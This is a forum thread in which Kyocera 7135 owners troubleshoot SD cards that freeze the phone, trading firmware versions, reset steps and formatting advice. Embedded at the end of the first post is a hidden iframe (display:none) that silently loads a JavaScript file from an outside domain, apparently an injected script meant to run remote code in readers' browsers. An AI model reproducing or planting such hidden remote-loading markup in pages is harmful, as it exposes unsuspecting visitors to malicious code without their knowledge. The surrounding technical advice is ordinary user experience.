+ Reply to Thread

SD card triggers BSOD

Help! After working without a glitch for the past week, inserting a SD card into my 7135 causes a black screen (when the card is inserted while the phone is in the Palm OS mode) and a blue screen (when in phone mode.) In either case, I have to do a soft reset. The phone then does not recognize the card. It's happening with both a 256MB SanDisk a 16MB Sharp-branded card from my Sharp camera. Both were working fine with no indication of trouble until today. I have one or two jpg photos on both cards, which can play back on the camera. I hear the 7135 chirp normally when the cards are inserted. After the freeze-up and soft reset, File Manager says "no card volume is mounted" and Photo View sends an error message to "insert card with jpg files."

Any ideas?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Same Problem Here

I'm having the same problem, but with a Lexar 256MB card. Both the 7135 and the SD card are new (bought them today). As soon as I insert the SD card into the side, I see a black screen. If I remove it, the 7135 resets.

I hope we can find an answer to our question. It may be firmware related, My versions are:

Phone Software:
    MZ1.0.34

PDA Software:
    SZ 1.0.20

PRL:

Re: Same Problem Here

Originally posted by jonecool
    My versions are:
    Phone Software:
    MZ1.0.34
    PDA Software:
    SZ 1.0.20
    PRL:
    MZ1.0.27
    SZ 1.0.13

Kyocera tech support thinks the card's format was damaged-- unlikely, since it happened to both cards at the same time. They suggested I try a few things-- reformat, scandisk, hard reset-- so I'll let you know if any of them work.

A hard reset seems to have corrected the problem, but it was REALLY funky. After the hard reset and before syncing, I checked the cards as instructed by tech support (to see if the problem was software-related.) They worked again. Then, I synced. Everything was restored, but the 7135 froze at the last step ("Cleaning up.") I did another hard reset and sync. Still got a freeze. This time I did a soft reset. That restored the phone, minus my applications and databases. I synced again, and everthing was restored. The cards still work. So all is as it should be.

Tech support says the phone is very sensitive to errors or glitches on cards. One of the options I was told to try was to reformat, which I did not do. If you do reformat on your PC, the tech says to be sure to select "FAT 16," not "FAT 32," if given a choice.

Good luck. Let me know what happens. I have a feeling this may be a recurring problem.

Even better is to do just a fat format. Fat 32 is completely unreadable, but when I reformatted the card on my phone and then put it in the reader on a Win XP machine it read FAT format. Not FAT 16 or FAT 32...
    I wasn't here
    You don't know me

Really should only format the card with the phone. Formatting it on your PC will cause problems.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.